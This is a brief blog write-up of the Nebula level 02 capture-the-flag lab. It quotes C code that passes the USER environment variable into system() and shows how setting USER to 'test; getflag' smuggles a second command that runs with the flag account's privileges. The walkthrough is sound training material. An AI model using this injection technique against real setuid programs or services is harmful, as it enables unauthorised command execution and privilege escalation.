Exploit Exercises Nebula 5: Level 02 Write Up

Exploit Exercises Nebula 5: Level 02 Write Up

Level: https://exploit-exercises.com/nebula/level02/

There is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it?

To do this level, log in as the level02 account with the password level02. Files for this level can be found in /home/flag02.

asprintf(&buffer, “/bin/echo %s is cool”, getenv(“USER”)); //command injection
printf(“about to call system(\”%s\”)\n”, buffer);


The code has a command injection vulnerability. We can exploit this by setting the environmental variable `USER` to `test; getflag` ```bash export USER="test; getflag" /home/flag02/flag02

You have successfully executed getflag on a target account.

Leave a Reply

Your email address will not be published. Required fields are marked *